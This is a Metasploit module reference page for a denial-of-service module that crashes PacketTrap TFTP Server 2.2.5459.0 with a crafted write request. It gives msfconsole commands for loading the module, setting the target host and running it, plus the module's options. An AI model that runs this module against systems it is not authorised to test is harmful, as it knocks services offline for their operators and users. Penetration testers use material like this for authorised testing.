Browse Exploit & Auxiliary Modules

The Metasploit Project hosts the world's largest database of quality assured exploits, including hundreds of remote exploits, auxiliary modules, and payloads. You can even review the Metasploit Framework source code of any module - or write your own.

Search for modules

PacketTrap TFTP Server 2.2.5459.0 DoS

The PacketTrap TFTP server version 2.2.5459.0 can be brought down by sending a special write request.


Rank

  • Normal

Authors

  • kris katterjohn < katterjohn [at] gmail.com >

References


Development


Similar Modules


Usage Information

$ msfconsole

                ##                          ###           ##    ##
 ##  ##  #### ###### ####  #####   #####    ##    ####        ######
####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##
####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##
## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ##
##   ##  #### ###   #####   #####     ##   ####   ####   #### ###
                                      ##

msf > use auxiliary/dos/windows/tftp/pt360_write
msf auxiliary(pt360_write) > set RHOST [TARGET IP]
msf auxiliary(pt360_write) > run


Module Options

RHOST The target address
RPORT The target port (default: 69)
CHOST The local client address
CPORT The local client port
VERBOSE Enable detailed status messages
WORKSPACE Specify the workspace for this module